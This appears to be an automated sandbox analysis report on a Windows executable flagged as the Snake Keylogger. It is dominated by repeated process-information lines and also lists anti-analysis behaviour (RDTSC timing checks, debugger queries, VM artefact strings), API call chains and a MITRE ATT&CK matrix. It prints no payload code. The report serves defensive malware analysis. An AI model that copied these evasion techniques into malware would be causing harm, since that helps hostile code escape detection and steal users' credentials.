Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rJustificante67.exe	API/Special instruction interceptor: Address: 38CF59C
Source: C:\Users\user\Desktop\rJustificante67.exe	API/Special instruction interceptor: Address: 1DEF59C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\rJustificante67.exe	RDTSC instruction interceptor: First address: 38A4CF4 second address: 38A4CF4 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FD758764A97h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rJustificante67.exe	RDTSC instruction interceptor: First address: 1DC4CF4 second address: 1DC4CF4 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FD759412FC7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc

Source: C:\Users\user\Desktop\rJustificante67.exe	Memory allocated: 25E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Memory allocated: 32E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Memory allocated: 32B10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc77E8.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405731
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_004061E5 FindFirstFileW,FindClose,	0_2_004061E5
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_00402706 FindFirstFileW,	6_2_00402706
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_00405731
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_004061E5 FindFirstFileW,FindClose,	6_2_004061E5

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: rJustificante67.exe, 00000006.00000002.2732658686.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rJustificante67.exe, 00000006.00000002.2732658686.0000000002938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH^
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\rJustificante67.exe	API call chain: ExitProcess graph end node			graph_0-4472
Source: C:\Users\user\Desktop\rJustificante67.exe	API call chain: ExitProcess graph end node			graph_0-4471

Source: C:\Users\user\Desktop\rJustificante67.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_00402D52 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,CreateFileW,LdrInitializeThunk,

0_2_00402D52

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\rJustificante67.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe

Process created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"

Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Users\user\Desktop\rJustificante67.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405EC4

Source: C:\Users\user\Desktop\rJustificante67.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rJustificante67.exe

Directory queried: number of queries: 1001

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	12 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
